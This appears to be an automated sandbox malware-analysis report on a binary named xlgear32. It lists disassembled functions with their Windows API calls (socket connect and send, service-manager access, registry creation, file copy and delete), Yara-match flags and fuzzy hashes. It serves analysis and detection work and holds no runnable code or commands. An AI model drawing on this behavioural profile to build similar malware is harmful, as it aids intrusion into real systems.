                                                                          • Instruction Fuzzy Hash: 17411AB1A15305AFDB109F64C91876BBBE9AF84359F104D1EF89987380EB74DD40CBA2

                                                                          Control-flow Graph (rendered graph not reproduced; summary recovered from its edge list, basic blocks 2d929ee-2d92ac6): WSASetLastError, closesocket and a call to 2d9a509 at 2d92a39-2d92a4c; a call to 2d92f50 at 2d92a17-2d92a36; ioctlsocket, WSASetLastError, closesocket and a call to 2d9a509 at 2d92a7b-2d92aad; calls to 2da0b10 on the remaining paths; exit at 2d92abe-2d92ac6.

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92A3B
                                                                          • closesocket.WS2_32 ref: 02D92A42
                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D92A89 (cmd 8004667E = FIONBIO with argp = 0: the socket is put back into blocking mode before it is closed)
                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D92A97
                                                                          • closesocket.WS2_32 ref: 02D92A9E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                          • String ID:
                                                                          • API String ID: 1561005644-0
                                                                          • Opcode ID: ad9b6e1c3a12ca5d42de8d044c3961fd1f0c925f5d3b45d7cee91f7dd6b85a35
                                                                          • Instruction ID: ac6da7658ae289d902e52ddfe746ccbaa12ce5b6588996d12255753aa3052825
                                                                          • Opcode Fuzzy Hash: ad9b6e1c3a12ca5d42de8d044c3961fd1f0c925f5d3b45d7cee91f7dd6b85a35
                                                                          • Instruction Fuzzy Hash: 7E217F72A04205EBEF219BB89958B6AB7E9EB84315F14496AF845D3380EB708D40CB61

                                                                          Control-flow Graph (rendered graph not reproduced; summary recovered from its edge list, basic blocks 2d91ba7-2d91c6e): a call to 2db53f0 and RtlEnterCriticalSection at 2d91ba7-2d91bcf; RtlLeaveCriticalSection and a call to 2d9e330 at 2d91be9-2d91bf7; RtlEnterCriticalSection at 2d91bfa-2d91c20; calls to 2d91b79 at 2d91bd4 and 2d91c22, each inside a loop; RtlLeaveCriticalSection at 2d91c55-2d91c6e.

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D91BAC
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                          • RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                          • String ID:
                                                                          • API String ID: 1633115879-0
                                                                          • Opcode ID: cde70a22bae742c8ded65f5cc3a2a2e7d8ad2ece000f6d169480afd23e30c95d
                                                                          • Instruction ID: e9054f8008d135a26ca0ed710b51c4b57fc17191820aeec143c0b5326c6d4426
                                                                          • Opcode Fuzzy Hash: cde70a22bae742c8ded65f5cc3a2a2e7d8ad2ece000f6d169480afd23e30c95d
                                                                          • Instruction Fuzzy Hash: C5217675A00206EBDB15CF68C484B9ABBB5FF88314F20858AE84A97301D770ED01CBA0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00403336
                                                                            • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                            • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                                          • GetCommandLineA.KERNEL32 ref: 00403384
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                                            • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                          • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                                          • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                          • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92EEE
                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92EFD (dwFlags 00000001 = WSA_FLAG_OVERLAPPED)
                                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D92F0C
                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D92F36 (level 00000029 = IPPROTO_IPV6, optname 0000001B = IPV6_V6ONLY, 4-byte optval: selects IPv6-only or dual-stack behaviour for the new socket)
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                          • String ID:
                                                                          • API String ID: 2093263913-0
                                                                          • Opcode ID: ed0cdc83ae0881ca0814b8b344b8223bdfd2a3e32355995f6ea5a9a388e65a61
                                                                          • Instruction ID: 9bf25ffa5526116613886b478db67ab82ddb8a2af34561bf0b6c5d969902ffd9
                                                                          • Opcode Fuzzy Hash: ed0cdc83ae0881ca0814b8b344b8223bdfd2a3e32355995f6ea5a9a388e65a61
                                                                          • Instruction Fuzzy Hash: 78012572A51204FBDB215F66DC58F5ABBA9EB89762F008965F9189B381D7708D00CBB0
                                                                          APIs
                                                                            • Part of subcall function 02D92D39: WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                            • Part of subcall function 02D92D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92E6D
                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D92E83
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Sendselect
                                                                          • String ID: 3' (likely the immediate 0x2733 = 10035 = WSAEWOULDBLOCK from a non-blocking WSASend, picked up as a two-byte string)
                                                                          • API String ID: 2958345159-280543908
                                                                          • Opcode ID: 1564f3cb82117ca9923c231a4d7f794b1588c0efe37372f9f8b0d307e1046443
                                                                          • Instruction ID: 46c3ca782ffbd6c03f4e4dd58ce56dbc17f5824c96c504d215f46f0a4fa63393
                                                                          • Opcode Fuzzy Hash: 1564f3cb82117ca9923c231a4d7f794b1588c0efe37372f9f8b0d307e1046443
                                                                          • Instruction Fuzzy Hash: 14317EB1E11209ABDF109FA8C858BEE7BAAEF44358F00455AEC0497380E7B59D54CBE0
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92AEA
                                                                          • connect.WS2_32(?,?,?), ref: 02D92AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastconnect
                                                                          • String ID: 3' (likely the immediate 0x2733 = 10035 = WSAEWOULDBLOCK from a non-blocking connect, picked up as a two-byte string)
                                                                          • API String ID: 374722065-280543908
                                                                          • Opcode ID: d73c3e5f4bc95cba493e0fc6a957fa510538f3566c0757c7d29be00bea5547b6
                                                                          • Instruction ID: c1f484406babeb0ecc3f348720fc8623ae6e0eb98337f8bcbe6caee9806b096a
                                                                          • Opcode Fuzzy Hash: d73c3e5f4bc95cba493e0fc6a957fa510538f3566c0757c7d29be00bea5547b6
                                                                          • Instruction Fuzzy Hash: 92219871E10104ABDF14AFA4C518BADB7FADF44329F104599ED1893384EB748D018FA1
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 50fbcfd287cf34ccff8d434c2fae82fff00721794e4387d6a905f207f3528dda
                                                                          • Instruction ID: ef84d0100637bd98e0b51e4d7be141f1b6df3a8f4e5c90027c43e8719570ce37
                                                                          • Opcode Fuzzy Hash: 50fbcfd287cf34ccff8d434c2fae82fff00721794e4387d6a905f207f3528dda
                                                                          • Instruction Fuzzy Hash: F95108B190524ADFCF45DF68D554AAABBA1EF08320F10819AF8699B380D774DD11CFA1
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02D936A7
                                                                            • Part of subcall function 02D92420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D92432
                                                                            • Part of subcall function 02D92420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D92445
                                                                            • Part of subcall function 02D92420: RtlEnterCriticalSection.NTDLL(?), ref: 02D92454
                                                                            • Part of subcall function 02D92420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D92469
                                                                            • Part of subcall function 02D92420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D92470
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1601054111-0
                                                                          • Opcode ID: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                          • Instruction ID: 26f8727f2f8e79e5c4488555cfa9995d523b54d56019dc4ab80bb4a0fc0bc2f1
                                                                          • Opcode Fuzzy Hash: d573a4629d340eab99a54c0f30da7730b5602fb168cca82297dbc83d4d1057b1
                                                                          • Instruction Fuzzy Hash: C511C1B6100209EBDF219E14DC85FAA3B6AEF44354F104456FE528A390C735DC60CBA4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEventValue
                                                                          • String ID:
                                                                          • API String ID: 3274066644-0
                                                                          • Opcode ID: 848ff14df3f2a634d379990b4fea930b8d779d49c9f6026ffbc23f3a2a8876a4
                                                                          • Instruction ID: 43f7f1bdc0e0de907177f6b6c59249bbdee9f16920e95659578899f9ec16038b
                                                                          • Opcode Fuzzy Hash: 848ff14df3f2a634d379990b4fea930b8d779d49c9f6026ffbc23f3a2a8876a4
                                                                          • Instruction Fuzzy Hash: 7D01D436C046819BC7055B78BF52AD6BBB2AA267307048279D9D2732B3D674880AD70D
                                                                          APIs
                                                                          • __beginthreadex.LIBCMT ref: 02DA2106
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D9A989,00000000), ref: 02DA2137
                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02D9A989,00000000), ref: 02DA2145
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 1685284544-0
                                                                          • Opcode ID: 1caba139bacf31fc3e3b5e4f4d7feaf2ba2da18f1a740653e7ca483f57361bdf
                                                                          • Instruction ID: e1646b97adb49ba62bc6ab2469618261d5aebd4fd9d8d2397ad95d347d4255c1
                                                                          • Opcode Fuzzy Hash: 1caba139bacf31fc3e3b5e4f4d7feaf2ba2da18f1a740653e7ca483f57361bdf
                                                                          • Instruction Fuzzy Hash: 34F0C271240200ABE7209F59DC94F95B3E9EF88324F24096AFA58C7380C771EC92CB90
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(02DC72B4), ref: 02D91ABA
                                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02D91ACB
                                                                          • InterlockedExchange.KERNEL32(02DC72B8,00000000), ref: 02D91AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                                          • String ID:
                                                                          • API String ID: 1856147945-0
                                                                          • Opcode ID: 90e2d31000afdc9c6dc782c760a094a5e834fea7cce165c702dd0d17c0e5d36f
                                                                          • Instruction ID: 83435cee26979110ea2506ed9b111d45f86963fea725dc0db52caf5f21d36e3b
                                                                          • Opcode Fuzzy Hash: 90e2d31000afdc9c6dc782c760a094a5e834fea7cce165c702dd0d17c0e5d36f
                                                                          • Instruction Fuzzy Hash: E6D05E32984215DFF22166A4AC1EB78F72CE745611F600756FC6AC13C4EA505D2489B6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID: /chk
                                                                          • API String ID: 481472006-3837807730
                                                                          • Opcode ID: f3a3eadc1d0c9a1a0394f1396bd1503ca77f71c6efbd0f1cd009767f1b99a43c
                                                                          • Instruction ID: cb0b5a5a7b7c7f0cbc1e9a26bf25cd872e3b9fcabbc26e344e1b4aa862cf7f22
                                                                          • Opcode Fuzzy Hash: f3a3eadc1d0c9a1a0394f1396bd1503ca77f71c6efbd0f1cd009767f1b99a43c
                                                                          • Instruction Fuzzy Hash: 4411E131E092918AD3009B74AF22BE67BB0A741720F04417AE9D2F60E3D3384949DB4D
                                                                          APIs
                                                                          • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 004027C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: ManagerOpen
                                                                          • String ID: \
                                                                          • API String ID: 1889721586-2967466578
                                                                          • Opcode ID: 2bfe48fefd9440e013fe4eef41469be407ac41d103b5cc7a3f1eeb799745b00b
                                                                          • Instruction ID: 7f1600a063a2e5460e31b11f98fe4f49db49c3c5fb27d8c1ae44caa3520fc949
                                                                          • Opcode Fuzzy Hash: 2bfe48fefd9440e013fe4eef41469be407ac41d103b5cc7a3f1eeb799745b00b
                                                                          • Instruction Fuzzy Hash: 50019CB1C086028ADB0C8B78FFB53BA7AE18704321F14007F8583A21E2C2BC4908DB1D
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D94BF2
                                                                            • Part of subcall function 02D91BA7: __EH_prolog.LIBCMT ref: 02D91BAC
                                                                            • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                            • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                            • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                            • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                            • Part of subcall function 02D9E0F8: __EH_prolog.LIBCMT ref: 02D9E0FD
                                                                            • Part of subcall function 02D9E0F8: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D9E17C
                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02D94CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1927618982-0
                                                                          • Opcode ID: d997eeff372ece0a145610144abd7cf9c052f22bbb57743eaf6f3151edfe596e
                                                                          • Instruction ID: 9ce73d10c0b2b4b67fe72276e2f6fecd9ca35c8296c99dc4935adc25efd554e1
                                                                          • Opcode Fuzzy Hash: d997eeff372ece0a145610144abd7cf9c052f22bbb57743eaf6f3151edfe596e
                                                                          • Instruction Fuzzy Hash: A451E375D04248EFDF15DFA8C884AEEBBB5EF09314F14815AE805AB352DB709A45CF60
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNEL32(80000002), ref: 0040DA35
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 0fc60fb11a91657524907a6390a633eaf13ae38cf2d5f0ea4cf2ddacf7384a51
                                                                          • Instruction ID: 959ffc0a15fdc0a25c22f6c24cae5b2d074bdbebd34e44a768e94947d5a8f4d2
                                                                          • Opcode Fuzzy Hash: 0fc60fb11a91657524907a6390a633eaf13ae38cf2d5f0ea4cf2ddacf7384a51
                                                                          • Instruction Fuzzy Hash: 46214975C082519ACB059B74AE557F97BB0AB25330F1441BAC9D2B31E3C234890ADB0D
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D92D47
                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D92D5C
                                                                            • Part of subcall function 02D9A509: WSAGetLastError.WS2_32(00000000,?,?,02D92A51), ref: 02D9A517
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$Send
                                                                          • String ID:
                                                                          • API String ID: 1282938840-0
                                                                          • Opcode ID: 43cb128e8c1a323060578659adb6942b6234d98188d5cac3369dc9d7304a1471
                                                                          • Instruction ID: 855cc7144929685a7fccefb4c441272b87045af26eabbbbe56e878d47c89df42
                                                                          • Opcode Fuzzy Hash: 43cb128e8c1a323060578659adb6942b6234d98188d5cac3369dc9d7304a1471
                                                                          • Instruction Fuzzy Hash: 230175B5501209FFDB205F98895496BBBEDEB45365B10492EF85983340EB709D00CBA1
                                                                          APIs
                                                                          • CopyFileA.KERNEL32 ref: 00402753
                                                                          • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 004027C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFileManagerOpen
                                                                          • String ID:
                                                                          • API String ID: 3059512871-0
                                                                          • Opcode ID: 8e1845cf7f92dca85c2c7619cc39d234705e43e0658ed4339084d981f9725aa2
                                                                          • Instruction ID: 009893bf2d519130fc0a2a9731e02dd1f0b91ef27533f4e4924aa85a8848ddc0
                                                                          • Opcode Fuzzy Hash: 8e1845cf7f92dca85c2c7619cc39d234705e43e0658ed4339084d981f9725aa2
                                                                          • Instruction Fuzzy Hash: 04F07DB19045128BDB0D8734FFB97B67AE5C704371B04007D9583E21F2C6B84808DB2C
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 02D98407
                                                                          • shutdown.WS2_32(?,00000002), ref: 02D98410
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastshutdown
                                                                          • String ID:
                                                                          • API String ID: 1920494066-0
                                                                          • Opcode ID: 4ebcb3f93ca717b9a04cab0f6e739682d6f20c098ebfaf66e1a2ca646266cc69
                                                                          • Instruction ID: 57155c1fe2d72041ed9504722f87e113f1d0407dda500f38b93a1af4d2657b7f
                                                                          • Opcode Fuzzy Hash: 4ebcb3f93ca717b9a04cab0f6e739682d6f20c098ebfaf66e1a2ca646266cc69
                                                                          • Instruction Fuzzy Hash: 29F09072A44314CFDB109F54D520B5AB7E6FF0A721F01881DF99997380D770AC00CBA1
                                                                          APIs
                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                            • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                                          • HeapDestroy.KERNEL32 ref: 004044A4
                                                                            • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                          • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                                          • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                                          • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 0995771757ca8982a654db045f2c3ae21ad12fa5f11763c182b0380433d8b45c
                                                                          • Instruction ID: 43002a762936cf1f6c7d63df3bb08050035719cca8984ed0d36bf37c093276e0
                                                                          • Opcode Fuzzy Hash: 0995771757ca8982a654db045f2c3ae21ad12fa5f11763c182b0380433d8b45c
                                                                          • Instruction Fuzzy Hash: C251E7F3A08618AFE7156E09EC807BEF7E9EFD4320F16853DE6C587700EA3158058696
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9511E
                                                                            • Part of subcall function 02D93D7E: htons.WS2_32(?), ref: 02D93DA2
                                                                            • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DB9
                                                                            • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonl$H_prologhtons
                                                                          • String ID:
                                                                          • API String ID: 4039807196-0
                                                                          • Opcode ID: 23e82597d14e33d6fe6d50509bcb76cb4c1ef993289fa26e50f9dbac9bcf7f71
                                                                          • Instruction ID: c79a961bf6aa47b93b83547b4d583bca3cfb44017d7e95053e08f0213e5ebd79
                                                                          • Opcode Fuzzy Hash: 23e82597d14e33d6fe6d50509bcb76cb4c1ef993289fa26e50f9dbac9bcf7f71
                                                                          • Instruction Fuzzy Hash: CF811775D0424A8ECF06DFA8E590AEEBBB5EF48214F10816AE851B7340EB765E05CF74
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 4279a992d83b44a2e96cb340aacb0e071a1b4da6028500d571e431b1f5cdf534
                                                                          • Instruction ID: fd7417bf197a56d4faf6ce23cc9f7073f52728074670db87e43eef8448b25924
                                                                          • Opcode Fuzzy Hash: 4279a992d83b44a2e96cb340aacb0e071a1b4da6028500d571e431b1f5cdf534
                                                                          • Instruction Fuzzy Hash: C44131F150C204AFE7156F09EC81B7EBBE8EF58714F06492DE7C583340E63668508A97
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: a943048851269d26c9bab0633ce003f790670846f77d66ef91684f795a00eb4d
                                                                          • Instruction ID: 4cb99202c2a347636a6da898d043f0bc40c4aa87a1931e48929950ba52d662e5
                                                                          • Opcode Fuzzy Hash: a943048851269d26c9bab0633ce003f790670846f77d66ef91684f795a00eb4d
                                                                          • Instruction Fuzzy Hash: F231E4F250C604AFE701BF19E885B7ABBE4EF54210F06492DE6C486700E636A854CB97
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E9C6
                                                                            • Part of subcall function 02D91A01: TlsGetValue.KERNEL32 ref: 02D91A0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologValue
